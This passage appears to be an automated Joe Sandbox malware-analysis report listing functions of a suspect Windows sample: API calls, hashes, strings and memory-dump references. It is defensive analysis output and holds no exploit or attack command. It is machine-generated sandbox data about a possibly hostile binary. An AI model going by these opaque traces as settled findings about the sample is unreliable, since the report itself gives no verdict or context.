                                                                                                                                                        • Opcode Fuzzy Hash: 3d939128caeb4f4a0c2a3e1391e0404935b02da9d145a63f7b898458335e617f
                                                                                                                                                        • Instruction Fuzzy Hash: 3821A236B1401813E7B4912E7929BBB49CAE7D4364F4E407AE40DDB358EE199C8B62D4
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                        • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                        • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                        • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                        • API String ID: 2943255653-4242577526
                                                                                                                                                        • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                        • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                        • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                        • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                        • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                        • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                        • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                        • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                        • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                        • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3486229058-0
                                                                                                                                                        • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                        • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                        • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                        • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExchangeInterlocked
                                                                                                                                                        • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                        • API String ID: 367298776-2876428247
                                                                                                                                                        • Opcode ID: 49d22ef3c92ac239a5687d4f94e176cb352ecd3f29265485bb5c781d6b7b6e4f
                                                                                                                                                        • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                        • Opcode Fuzzy Hash: 49d22ef3c92ac239a5687d4f94e176cb352ecd3f29265485bb5c781d6b7b6e4f
                                                                                                                                                        • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2801635615-0
                                                                                                                                                        • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                        • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                        • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                        • Instruction Fuzzy Hash: 1F51BE3020474A9BD7249F319558BBBBBF8AF84742F04485EE5DEC3361DB28EA08C724
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?), ref: 004F3709
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F374C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F375C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F376D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F377A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37A9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F37C5
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F37D5
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F37EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                        • Instruction ID: 1822ab8b2bc00c4b335a7296647f06df4fe24da2c1cedc303b1505dbbb5a7089
                                                                                                                                                        • Opcode Fuzzy Hash: 318028bd3e644244c467fd2509390a4b47584e5d5e6a88b99469994f74e86a6d
                                                                                                                                                        • Instruction Fuzzy Hash: 2831D1B11087894BC610AF35A9807EBFBF8BF89714F04499DE5E953251C734AA1DC726
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: gethostbynamehtonlhtonsinet_addr
                                                                                                                                                        • String ID: localhost
                                                                                                                                                        • API String ID: 4009071410-2663516195
                                                                                                                                                        • Opcode ID: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                        • Instruction ID: cf482c115b2fa46a5b5609c5aae3d134ea41c2cdeafd480f3feffcf81808ee73
                                                                                                                                                        • Opcode Fuzzy Hash: a84127021668ac66c92549beb1820c1694ea4c36d481015665288550d8e57417
                                                                                                                                                        • Instruction Fuzzy Hash: 9131ED30208311ABDB20DF249C85BBBB7E5FF95710F004A1EF9559B381E7719948C7A6
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM(00000000), ref: 004145E1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timetime
                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                        • API String ID: 17336451-2178600047
                                                                                                                                                        • Opcode ID: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                        • Instruction ID: e32ce3efbecf0e845fb5c017bd6949167df468d5a0ad1b28c98723774e94ba96
                                                                                                                                                        • Opcode Fuzzy Hash: a6eb4a1a4bf024f16c397edd5e841aed2049ab2de515439dd25e44f6491a1c28
                                                                                                                                                        • Instruction Fuzzy Hash: 79C17E313046059BD718DF15C494BEA77A6BFC8704F18856EE8498F382CB79ED42CB9A
                                                                                                                                                        APIs
                                                                                                                                                        • timeKillEvent.WINMM(?), ref: 004D8B13
                                                                                                                                                        • Sleep.KERNEL32(00000001,?,0041D4A9), ref: 004D8B2D
                                                                                                                                                        • waveOutReset.WINMM(?,?,0041D4A9), ref: 004D8B34
                                                                                                                                                        • waveOutUnprepareHeader.WINMM(?,-000013C4,00000020,?,?,0041D4A9), ref: 004D8B5A
                                                                                                                                                        • Sleep.KERNEL32(00000001,?,?,0041D4A9), ref: 004D8B63
                                                                                                                                                        • waveOutClose.WINMM(?,?,0041D4A9), ref: 004D8B86
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
